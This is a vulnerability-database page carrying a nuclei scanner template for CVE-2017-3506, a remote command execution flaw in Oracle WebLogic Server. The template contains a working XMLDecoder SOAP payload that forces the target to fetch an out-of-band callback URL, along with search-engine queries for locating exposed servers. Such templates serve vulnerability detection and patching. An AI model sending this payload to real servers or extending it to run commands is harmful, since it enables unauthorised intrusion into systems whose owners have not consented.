Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 43 Views

Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Gitee		Exploit for Improper Input Validation in Joomla Joomla\!
13 Sep 202011:52
gitee
Gitee		Exploit for Improper Input Validation in Joomla Joomla\!
21 Oct 202022:39
gitee
Gitee		Exploit for Improper Input Validation in Joomla Joomla\!
11 Mar 202001:42
gitee
Gitee		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
19 May 202009:53
gitee
Gitee		Exploit for Improper Input Validation in Joomla Joomla\!
9 Oct 201917:20
gitee
Gitee		Exploit for Improper Input Validation in Joomla Joomla\!
26 May 202023:42
gitee
Gitee		Exploit for Improper Input Validation in Joomla Joomla\!
27 Jul 202503:43
gitee
GithubExploit		Exploit for OS Command Injection in Oracle Weblogic_Server
18 Nov 202001:50
githubexploit
GithubExploit		Exploit for Injection in Oracle Agile_Plm
23 Aug 201901:42
githubexploit
ATTACKERKB		CVE-2017-3506
24 Apr 201700:00
attackerkb
Rows per page
id: CVE-2017-3506

info:
  name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution
  author: pdteam
  severity: high
  description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix this vulnerability.
  reference:
    - https://hackerone.com/reports/810778
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
    - http://www.securitytracker.com/id/1038296
    - https://github.com/CVEDB/top
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 7.4
    cve-id: CVE-2017-3506
    epss-score: 0.96015
    epss-percentile: 0.99867
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - http.title:"oracle peoplesoft sign-in"
      - product:"oracle weblogic"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle,kev,vkev,vuln

http:
  - raw:
      - |
        POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
        Content-Type: text/xml;charset=UTF-8

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java version="1.8" class="java.beans.XMLDecoder">
                <void id="url" class="java.net.URL">
                  <string>http://{{interactsh-url}}</string>
                </void>
                <void idref="url">
                  <void id="stream" method ="openStream"/>
                </void>
              </java>
            </work:WorkContext>
            </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a0046304402200412c6a42d38ac8f9da320e43f32387676acadec91c01b28fab5ee063dad8234022074f60a2b10cb6bc87a6666c8a7d7f205e83f317e1e70dd6c210894d67644d456:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
8.4High risk
Vulners AI Score8.4
CVSS 25.8
CVSS 3.17.4
EPSS0.96015
SSVC
cve-2017-3506remote command executionoracle fusion middlewareoracle weblogichttphackeroneoracle
43